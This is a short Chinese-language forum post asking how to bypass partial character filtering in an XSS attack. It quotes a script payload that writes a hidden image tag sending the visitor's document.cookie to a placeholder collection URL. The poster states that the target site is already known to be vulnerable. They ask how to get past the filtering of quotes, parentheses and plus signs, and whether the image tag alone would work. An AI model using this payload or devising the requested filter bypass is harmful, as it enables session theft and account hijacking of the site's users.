返回列表 发帖

求教部分过滤的XSS脚本攻击解决办法

<!--        <script>document.write('<img src="http://url/news.asp?msg='+document.cookie+'" width=0 height=0 border=0 />');</script>            -->
用以上语句获取COOKIE时,' () +被过滤了,是否有办法突破?(已知有XSS漏洞)
只用<img。。。。。。。。/>这段能否达到目的?与加上JS的语句有什么区别?

返回列表